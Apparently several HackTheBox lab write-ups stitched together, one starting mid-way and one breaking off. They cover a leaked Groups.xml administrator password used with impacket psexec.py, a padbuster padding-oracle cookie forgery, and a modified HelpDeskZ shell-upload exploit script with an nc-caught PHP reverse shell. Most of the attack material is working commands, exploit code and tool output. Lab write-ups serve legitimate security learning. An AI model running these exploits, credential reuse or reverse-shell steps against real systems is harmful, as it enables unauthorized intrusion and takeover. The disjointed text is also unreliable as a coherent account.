UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
We found that there is a Groups.xml left which has Administrator credential.
Administrator:MyUnclesAreMarioAndLuigi!!1!
As we talked, Kali has impacket installed by default.
We can use the script “psexec.py” and get an administrator shell.
root@kali:/usr/share/doc/python-impacket/examples# ./psexec.py QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$[*] Uploading file JEUWVaHv.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service qkdV on 10.10.10.125.....
[*] Starting service qkdV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Lazy” on that website.
Lazy is a bit old machine but I needed to practice Padding Oracle attack for a ctf and Lazy is a good for that purpose.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.18 -sC-sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-10 12:49 EEST
Nmap scan report for 10.10.10.18
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
| 2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
| 256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_ 256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.57 seconds
Since I had similar situation in a CTF previously, it is not difficult to assume we can do “Oracle padding attack”.
We can use padbuster to exploit the binary.
When we run the script, at first we have to specify what is the response signatures we have to ignore.
root@kali:~# padbuster http://10.10.10.18/index.php GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k 8 --cookiesauth=GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 15
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Then, wait for the result.
We can decrypt the base64 and the value is “user=1n4r1”.
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (126/256)[Byte 8]
[+] Success: (241/256)[Byte 7]
[+] Success: (47/256)[Byte 6]
[+] Success: (220/256)[Byte 5]
[+] Success: (127/256)[Byte 4]
[+] Success: (24/256)[Byte 3]
[+] Success: (221/256)[Byte 2]
[+] Success: (156/256)[Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 64e730165be8801c
[+] Intermediate Bytes (HEX): 6c24ee8420d20d83
[+] Plain Text: user=ina
Use of uninitialized value $plainTextBytesin concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***[+] Success: (229/256)[Byte 8]
[+] Success: (124/256)[Byte 7]
[+] Success: (19/256)[Byte 6]
[+] Success: (167/256)[Byte 5]
[+] Success: (235/256)[Byte 4]
[+] Success: (208/256)[Byte 3]
[+] Success: (47/256)[Byte 2]
[+] Success: (226/256)[Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): da6ba027bc005e64
[+] Intermediate Bytes (HEX): 16d636105dee861a
[+] Plain Text: r1
-------------------------------------------------------** Finished ***[+] Decrypted value (ASCII): user=1n4r1
[+] Decrypted value (HEX): 757365723D696E617231060606060606
[+] Decrypted value (Base64): dXNlcj1pbmFyMQYGBgYGBg==-------------------------------------------------------
So what we can assume is that if we forge the base64 encoded cookie with value “user=admin”, we can bypass the authentication.
root@kali:~# padbuster http://10.10.10.18/index.php GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k 8 --cookiesauth=GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k -plaintextuser=admin
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 15
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (196/256)[Byte 8]
[+] Success: (148/256)[Byte 7]
[+] Success: (92/256)[Byte 6]
[+] Success: (41/256)[Byte 5]
[+] Success: (218/256)[Byte 4]
[+] Success: (136/256)[Byte 3]
[+] Success: (150/256)[Byte 2]
[+] Success: (190/256)[Byte 1]
Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d
[+] Success: (1/256)[Byte 8]
[+] Success: (36/256)[Byte 7]
[+] Success: (180/256)[Byte 6]
[+] Success: (17/256)[Byte 5]
[+] Success: (146/256)[Byte 4]
[+] Success: (50/256)[Byte 3]
[+] Success: (132/256)[Byte 2]
[+] Success: (135/256)[Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe
-------------------------------------------------------** Finished ***[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
Then try to access with the cookie “auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA”.
We can find an interesting path “/mysshkeywithnamemitsos”
By accessing the url “http://10.10.10.18/mysshkeywithnamemitsos”
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Help” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -sV-sC-p- 10.10.10.121
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-30 08:06 EET
Nmap scan report for 10.10.10.121
Host is up (0.035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.73 seconds
We already have an exploit code on our kali linux. However, we need to modify the script a bit.
I’ve commented the line to be fixed and added a new line.
#! /usr/bin/python
import hashlib
import time
import sys
import requests
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
if len(sys.argv) < 3:
print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
sys.exit(1)
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
# currentTime = int((datetime.datetime.strptime(r.headers['date'], %a, %d %b %Y %H%M%S %Z) - datetime.datetime(1970,1,1)).total_seconds())
currentTime = int(time.time())
for x in range(0, 300):
plaintext = fileName + str(currentTime - x)
md5hash = hashlib.md5(plaintext).hexdigest()
url = helpdeskzBaseUrl+md5hash+'.php'
response = requests.head(url)
if response.status_code == 200:
print "found!"
print url
sys.exit(0)
print "Sorry, I did not find anything"
Then, upload our php web reverse shell, launch nc and run the exploit.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN)[10.10.10.121] 45226
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
13:00:57 up 5:15, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help)gid=1000(help)groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)